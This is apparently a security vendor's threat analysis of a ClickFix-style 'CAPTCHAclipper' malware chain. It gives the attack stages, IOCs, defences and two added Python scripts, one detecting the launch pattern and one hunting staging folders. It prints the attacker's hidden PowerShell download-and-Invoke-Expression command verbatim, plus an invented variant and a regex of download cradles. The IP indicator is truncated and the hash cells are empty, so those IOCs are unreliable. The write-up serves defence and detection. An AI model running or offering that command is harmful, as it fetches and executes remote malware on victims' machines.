Conscia SOC team uncovered a new attack exploiting CAPTCHA prompts. The “CAPTCHAclipper” attack blends social engineering and technical sophistication to deploy malware. Read our analysis to understand the attack chain, IOCs, and actionable defenses.
The Conscia Security Operations Center (SOC) team recently uncovered a meticulously crafted attack chain executed by a threat actor leveraging a seemingly innocuous CAPTCHA prompt.
This attack, which we’ve dubbed CAPTCHAclipper, exemplifies the convergence of social engineering and technical sophistication to compromise victims’ systems and exfiltrate sensitive data.
We observed the same TTPs in three distinct attacks over the course of one month, all within the European geographical region.
Due to the nature of the attack chain, we suspect a sophisticated threat actor is behind these attacks. However, we cannot provide any attribution at the time of writing. The main payload is probably a variant of LummaC2 malware.
When we first investigated the incident, the IOCs we collected were not flagged as malicious by public reputation sources, which points to novel or freshly rotated TTPs and infrastructure. As of publishing this article, some AV engines already recognize at least some of the IOCs, but the actor can alter and repurpose them with little effort, so detections should target the behaviour of the chain rather than these specific values.
Below, we discuss different stages of the attack chain.
Analysis of Attack Chain
Stage 1: The Malicious CAPTCHA Lure
The attack began with a targeted phishing lure that directed users to a malicious but legitimate-looking website offering a PDF file for download. Before the download could proceed, the victim was presented with an interactive CAPTCHA.
This initial step served a dual purpose:
- It established a layer of trust by mimicking legitimate verification methods.
- It initiated the first technical step via JavaScript: writing a command to the clipboard, a technique also known as 'ClickFix' or 'paste and run'.
When users engaged with the CAPTCHA to access a promised PDF file, a malicious JavaScript payload silently executed in the background.
This script copied a PowerShell command to the system clipboard, preparing the ground for the next stage:
powershell -WindowStyle Hidden -Command "$rQd='https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt'; $pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;"
Stage 2: Social Engineering with Malicious Instructions
After completing the CAPTCHA, victims were shown a notice that additional "verification steps" were required before the file could be downloaded. To obtain the file, the victim had to follow the provided instructions, which were critical to the attack's success:
- Press Win+R to open the Run dialog.
- Press CTRL+V to paste the clipboard contents, unknowingly inserting the attacker's command.
- Press Enter.
This seemingly benign sequence was, in reality, a carefully engineered delivery mechanism. The pasted command:
- Downloaded a malicious script (prizev2.txt) from a remote server using a WebClient download cradle.
- Executed the script entirely in memory via Invoke-Expression, so no script file ever touched disk for file-based detections to inspect.
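As an added example (not Conscia's code or tooling), the following Python script scores process-creation records for the launch pattern Stage 2 produces: powershell.exe spawned from explorer.exe (the Run dialog) with a hidden window, a download cradle and in-memory execution. The records are constructed to resemble the ParentImage / Image / CommandLine fields of Sysmon Event ID 1 (or Security Event ID 4688 with command-line auditing); the first uses the Stage 1 command verbatim, and the remaining ones, including the example.invalid host, are invented benign and malicious variants to show that the check generalizes beyond the exact string.

```python
"""Score process-creation records for a ClickFix / paste-and-run PowerShell launch.

Added example, not Conscia's code. The events below are constructed to resemble
the ParentImage / Image / CommandLine fields of Sysmon Event ID 1 (or the
equivalent Security 4688 fields); the first uses the Stage 1 command verbatim,
the rest are invented variants.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Patterns are applied to the normalized command line (lower case, quotes removed).
CRADLE = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|invoke-restmethod"
    r"|\biwr\b|\birm\b|\bcurl\b|\bwget\b"
)
IN_MEMORY_EXEC = re.compile(r"invoke-expression|\biex\b")
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b")
URL = re.compile(r"https?://[\w.\-\[\]/:%?=&]+")
# Straight and curly quotes are stripped so quoting tricks do not split a keyword.
QUOTES = str.maketrans("", "", "\"'\u2018\u2019\u201c\u201d")


def normalize(command_line: str) -> str:
    return " ".join(command_line.translate(QUOTES).lower().split())


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def extract_urls(command_line: str) -> list[str]:
    """Pull the download URL(s) out of the cradle for IOC extraction."""
    return URL.findall(normalize(command_line))


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); higher means closer to the CAPTCHAclipper launch pattern."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd = normalize(ev.command_line)
    score, reasons = 0, []
    has_cradle = CRADLE.search(cmd) is not None
    has_exec = IN_MEMORY_EXEC.search(cmd) is not None
    if has_cradle and has_exec:
        score += 3
        reasons.append("download cradle fed to Invoke-Expression (in-memory execution)")
    elif has_cradle:
        score += 1
        reasons.append("download cradle")
    if basename(ev.parent_image) == "explorer.exe":
        # Win+R / Run dialog launches PowerShell as a child of explorer.exe.
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog or interactive launch)")
    if HIDDEN_WINDOW.search(cmd):
        score += 1
        reasons.append("hidden window")
    return score, reasons


def find_clickfix(events: list[ProcessEvent], threshold: int = 4) -> list[dict]:
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"command_line": ev.command_line, "score": score,
                         "reasons": reasons, "urls": extract_urls(ev.command_line)})
    return hits


# Constructed sample telemetry (not real logs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGE1_COMMAND = (
    "powershell -WindowStyle Hidden -Command \"$rQd='https://s3-scw-tx.b-cdn[.]net/prizev2[.]txt'; "
    "$pLs=New-Object System.Net.WebClient; $sLf=$pLs.DownloadString($rQd); Invoke-Expression $sLf;\""
)
EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", PS, STAGE1_COMMAND),
    # Invented variant with a different cradle and aliases: the check is not string matching.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -w hidden -c "iex (iwr http://example.invalid/x.txt)"'),
    # Benign: scheduled backup script started from cmd.exe.
    ProcessEvent(r"C:\Windows\System32\cmd.exe", PS,
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"),
    # Benign: interactive one-liner from the Run dialog, no download.
    ProcessEvent(r"C:\Windows\explorer.exe", PS,
                 'powershell -NoExit -Command "Get-Process | Sort-Object CPU -Descending"'),
]

if __name__ == "__main__":
    for hit in find_clickfix(EVENTS):
        print(hit["score"], hit["reasons"], hit["urls"])
```

The explorer.exe parent alone is only worth two points because shortcuts and interactive launches also produce it; what separates the lure from ordinary admin activity is the combination of a cradle feeding Invoke-Expression with a hidden window, which is why those carry most of the weight.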
Stage 3: Deployment of Malicious Payload
The downloaded script carried out multiple tasks to prepare for further exploitation:
- Retrieved a ZIP archive (prize.zip) from https://fixedzip.oss-ap-southeast-5.aliyuncs.com.
- Extracted the archive contents into a randomly named folder under the APPDATA directory.
- Launched the extracted executable setup.exe, initiating the attack's next phase.
Staging under the user's APPDATA directory requires no elevation and places the payload among many legitimate per-user application folders, which lowers its visibility to routine security scans and underlines the actor's focus on evasion.
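As an added example (not Conscia's tooling), the following Python script implements the check a threat hunter would run after this stage: walk the folders directly under %APPDATA% and flag those whose name looks machine-generated and which contain the artifacts named in this report (setup.exe, AutoIt3.exe, a .pif file). The entropy-and-digits heuristic for "random" names and the sample profile layout are assumptions; the profile tree is constructed in a temporary directory so the script runs offline, and it falls back to the real %APPDATA% when run on a Windows host.

```python
"""Hunt %APPDATA% for randomly named staging folders holding the Stage 3/4 artifacts.

Added example, not Conscia's code. The heuristic (high-entropy folder name with
digits, plus setup.exe / AutoIt3.exe / a .pif inside) is an assumption for
triage; the demo tree is constructed in a temporary directory.
"""
from __future__ import annotations

import math
import os
import tempfile
from collections import Counter
from pathlib import Path

SUSPECT_NAMES = {"setup.exe", "autoit3.exe"}   # file names reported in the analysis above
SUSPECT_EXTS = {".pif"}                         # 69HT8K.pif; .pif files are rare in user profiles


def shannon_entropy(text: str) -> float:
    counts = Counter(text)
    return -sum(n / len(text) * math.log2(n / len(text)) for n in counts.values())


def looks_random(name: str) -> bool:
    """Heuristic for generated folder names: long, high entropy, digits mixed with letters."""
    return (len(name) >= 8 and shannon_entropy(name) >= 3.0
            and any(c.isdigit() for c in name) and any(c.isalpha() for c in name))


def suspect_files(folder: Path) -> list[str]:
    return sorted(f.name for f in folder.rglob("*")
                  if f.is_file() and (f.name.lower() in SUSPECT_NAMES
                                      or f.suffix.lower() in SUSPECT_EXTS))


def hunt(appdata: Path) -> list[dict]:
    """Return one finding per top-level APPDATA folder that matches the staging pattern."""
    findings = []
    for folder in sorted(p for p in appdata.iterdir() if p.is_dir()):
        hits = suspect_files(folder)
        if not hits:
            continue
        reasons = []
        if looks_random(folder.name):
            reasons.append("randomly named folder")
        if any(h.lower().endswith(".pif") for h in hits):
            reasons.append(".pif file present")
        if reasons:
            findings.append({"folder": folder.name, "files": hits, "reasons": reasons})
    return findings


def build_demo_tree(root: Path) -> None:
    """Constructed profile layout: two ordinary vendor folders and one staging folder."""
    for rel in ["Mozilla/Firefox/profiles.ini", "Adobe/Acrobat/updater.exe",
                "Xk8fQ2pLm3/setup.exe", "Xk8fQ2pLm3/AutoIt3.exe", "Xk8fQ2pLm3/69HT8K.pif"]:
        path = root / rel
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_bytes(b"placeholder")


def demo() -> list[dict]:
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_demo_tree(root)
        return hunt(root)


if __name__ == "__main__":
    appdata = os.environ.get("APPDATA")
    target = Path(appdata) if appdata and Path(appdata).is_dir() else None
    for finding in (hunt(target) if target else demo()):
        print(finding)
```

A folder named "Adobe" that happens to contain an updater.exe is not reported, because neither the name nor the file matches; the staging folder is reported on both counts. Treat the output as triage input, not a verdict: confirm with the file hashes and the scheduled task described in Stage 4.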
Stage 4: Malicious Activities of Setup.exe
The executable setup.exe was a potent tool designed for both immediate impact and long-term persistence. Its TTPs included:
- Credential Theft: Extracting login credentials from the browser credential stores (the Login Data file) of several browsers at their default profile locations.
- Reconnaissance: Enumerating installed antivirus and endpoint protection software in order to evade or disable defenses.
- Command-and-Control (C2) Communication: Establishing an outbound connection to 21.4.107:443, linked to the domain sliperyedhby.icu. This connection facilitated data exfiltration and allowed the attacker to issue further commands.
- Persistence Mechanisms: Registering itself in the Windows Task Scheduler for automatic execution after system reboots, and creating an additional file (69HT8K.pif), potentially as a decoy or a secondary stage.
Indicators of Compromise (IOCs)
File Artifacts

| File Name | SHA-256 |
|-----------|---------|
| Setup.exe | |
| AutoIt3.exe | |

Networking Artifacts

| Type | Value |
|------|-------|
| Domains | s3-scw-tx.b-cdn[.]net, fixedzip.oss-ap-southeast-5.aliyuncs.com, sliperyedhby.icu |
| IP Address | 21.4.107:443 |
Implications and Lessons Learned
The CAPTCHAclipper attack highlights a sophisticated, multi-layered approach to compromising systems:
- User Interaction as an Attack Vector: The reliance on user-driven actions (pasting and running a command the page placed on the clipboard) exemplifies the effectiveness of social engineering, and it sidesteps browser download protections because the browser never downloads an executable.
- Memory-Based Execution: Executing payloads in memory minimized detection by traditional antivirus solutions.
- Persistence and Exfiltration: Establishing persistence ensured long-term access, while C2 communication enabled data theft and remote control.
Effective defense strategies
The CAPTCHAclipper attack is a reminder of the evolving tactics employed by cyber adversaries. Its blend of technical ingenuity and psychological manipulation demonstrates the importance of proactive defense strategies. By combining social engineering with multi-stage, in-memory infection techniques, attackers bypass traditional defenses and exploit user trust.
To defend against such sophisticated threats, Conscia SOC recommends that organizations adopt a multi-faceted cybersecurity approach:
- User Awareness Training: Conduct regular training sessions to help employees recognize phishing and other social engineering techniques.
- Enable Endpoint Detection and Response (EDR): Deploy solutions that can identify and mitigate fileless malware and suspicious PowerShell activity.
- Employ continuous monitoring of security events: Deploying security solutions is not enough if no analyst reviews the alerts they produce. Timeliness of detection is crucial in these attacks, because everything after the user presses Enter is automated.
- Restrict PowerShell Usage: Limit PowerShell execution to signed scripts only, and monitor PowerShell activity closely. Note that the execution policy is not a security boundary: the lure above runs an inline -Command string and never touches a script file, so the policy must be paired with application control (AppLocker or WDAC, which also enforces Constrained Language Mode), PowerShell script block logging (Event ID 4104), and process creation auditing with command-line capture (Security Event ID 4688 or Sysmon Event ID 1) so that a hidden powershell.exe spawned by explorer.exe with a download cradle stands out. Removing the Run dialog (Win+R) for standard users via Group Policy breaks this particular lure outright.
- Network Monitoring and Data Leak Detection: Implement network monitoring tools to detect unusual outbound connections to C2 servers or unauthorized data exfiltration.
- Incident Response Planning: Ensure your team is prepared to respond to multi-stage infections with a clear remediation strategy.
In addition to that, we also encourage all cybersecurity professionals to actively participate in the cybersecurity community. You can:
- Collaborate and Share Intelligence: Share insights and indicators of compromise (IOCs) with trusted communities to help combat similar threats.
- Report and Investigate: If you detect similar activity, report it to your threat intelligence providers or national cybersecurity bodies to track emerging trends.
- Enhance Threat Hunting: Leverage this analysis as a use case to improve threat-hunting capabilities within your organization.